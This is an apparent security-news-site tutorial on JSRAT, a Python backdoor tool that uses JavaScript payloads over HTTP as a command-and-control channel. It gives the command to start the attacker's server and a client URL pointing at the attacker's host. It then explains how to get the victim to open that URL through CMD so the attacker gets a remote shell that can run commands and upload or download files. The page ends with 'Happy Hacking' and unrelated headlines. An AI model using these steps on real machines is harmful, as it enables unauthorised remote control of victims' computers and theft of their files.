Thursday, May 22, 2025
HomeBackdoorJSRAT - Secret Command & Control Channel Backdoor to Control Victims Machine...

JSRAT – Secret Command & Control Channel Backdoor to Control Victims Machine Using JavaScript

Published on

SIEM as a Service

Follow Us on Google News

JsRat is python based script developed to backdoor victim machine using JavaScript payloads and the HTTP protocol for communication between the server and the target hosts.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

Installation & Setup :-

  • Download the JSRAT tool Here
  • Download and give appropriate permission to execute the script.Above figure shows the complete installation

Starting the web server:

  • Run and execute the command: python JSRAT.py -i <kali Linux or Attacker Ip> -p 8080
  • JSRAT provides the list of URLs.Copy the Client command here it is http://192.168.172.143:8080/wtf

VICTIM MACHINE:-

  • Open this Client command URL with Victim browser
  • To gain the shell payload generated by URL should be opened with CMD.
  • Once the command is executed a shell will be obtained.

BACK TO ATTACKERS MACHINE WITH BACKDOOR:-

  • Here we go !!! We have connected with the Victim machine
  • Let us try some windows command: Ipconfig
JSRAT
  • The above Figure shows executing the command calc opens up the Windows calculator.JSRat can also provide upload, Read and Download files. Happy Hacking !!!

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

Latest articles

Hackers Target Mobile Users Using PWA JavaScript to Bypass Browser Security

A sophisticated new injection campaign has been uncovered, targeting mobile users through malicious third-party...

Docker Zombie Malware Infects Containers for Crypto Mining and Self-Replication

A novel malware campaign targeting containerized infrastructures has emerged, exploiting insecurely exposed Docker APIs...

Hackers Masquerade as Organizations to Steal Payroll Logins and Redirect Payments from Employees

ReliaQuest, hackers have deployed a cunning search engine optimization (SEO) poisoning scheme to orchestrate...

PupkinStealer Exploits Web Browser Passwords and App Tokens to Exfiltrate Data Through Telegram

A newly identified .NET-based information-stealing malware, dubbed PupkinStealer (also known as PumpkinStealer in some...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Intruder vs. Acunetix vs. Attaxion: Comparing Vulnerability Management Solutions

The vulnerability management market is projected to reach US$24.08 billion by 2030, with numerous...

Cable: Powerful Post-Exploitation Toolkit for Active Directory Attacks

Cybersecurity researchers are raising alarms about Cable, a potent open-source post-exploitation toolkit designed to exploit...

Google Launches Open-Source OSV-Scanner for Detecting Security Vulnerabilities

Google has announced the launch of OSV-Scanner V2, an open-source tool designed to enhance vulnerability...